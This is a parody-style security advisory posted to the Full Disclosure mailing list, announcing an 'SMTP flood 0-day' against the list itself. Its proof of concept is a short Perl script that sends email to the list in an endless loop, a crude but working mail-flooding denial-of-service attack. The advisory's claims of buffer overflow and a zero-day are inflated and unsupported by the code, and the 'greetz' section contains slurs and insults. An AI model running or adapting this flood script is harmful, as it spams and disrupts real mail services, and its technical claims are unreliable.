Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit

==========
1. Description
==========
It is possible to flood Full Disclosure Mailing List via the SMTP protocol, causing possible buffer overflow, probable disk write failure, and definate DoS.

==========
2. Solution
==========
The clear solution, as per Bantown security, is to moderate all mailing lists for an until the ESMTP MTA developers can reach a better solution.

==========
3. History
==========
Mar 13, 2006 [+] Vendor Notification.
Mar 13, 2006 [+] Public Disclosure.

==========
4. PoC
==========
#!/usr/bin/perl
#
# SMTP FLOOD PoC
# by Jmax, Bantown Security, INC.
#
# greetz 2
# weev, hep, hugparty, bob, tosh, choob,
# krade, the church of jesus christ of latter-day saints,
# n3td3v, Gadi Evron, Dave Aitel, Carolyn Meinel, CERT,
# u4ea, the jizztapo, CDEJ for being gay french, all of bantown and ED.
use warnings;
use strict;
use Mail::Sendmail;
my %mail = (
         from => '[EMAIL PROTECTED]',
         to => ' [email protected]',
         subject => 'SMTP FLOOD PoC',
);
while (1) {
  sendmail(%mail);
}
==========
A. References
==========
RFC 821

==========
B. Contact
==========
Jmax, Bantown Security, INC. [EMAIL PROTECTED]
1-888-565-9428
GSAE GREM SSP-CNSA CAP SSCP
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Reply via email to